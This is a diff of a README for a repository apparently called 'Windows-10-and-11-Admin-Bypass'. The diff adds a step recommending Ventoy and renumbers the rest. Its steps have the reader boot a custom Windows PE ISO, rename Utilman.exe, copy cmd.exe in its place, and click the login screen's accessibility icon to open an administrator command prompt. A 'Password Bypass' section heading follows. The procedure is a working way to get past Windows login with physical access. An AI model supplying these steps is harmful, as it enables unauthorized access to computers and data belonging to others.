Py0x11/Windows-10-and-11-Admin-Bypass/README.md

 To use Unofficial Custom Windows PE, follow these steps:

 1. Boot the Py0x11_CMD.iso file.
+2. for booting the iso file i recommend using ventoy [https://www.ventoy.net/]
-2. Type in the following command: `ren C:\Windows\System32\Utilman.exe Utilman.old`
+3. Type in the following command: `ren C:\Windows\System32\Utilman.exe Utilman.old`
-3. Type in the following command: `copy C:\Windows\System32\cmd.exe Utilman.exe`
+4. Type in the following command: `copy C:\Windows\System32\cmd.exe Utilman.exe`
-4. Type in the command `exit`, and the window will close and reboot you into your main Windows boot.
+5. Type in the command `exit`, and the window will close and reboot you into your main Windows boot.
-5. Click on the Accessibility icon on the bottom right corner of the login screen to open the Administrator Command Prompt.
+6. Click on the Accessibility icon on the bottom right corner of the login screen to open the Administrator Command Prompt.

 ## Password Bypass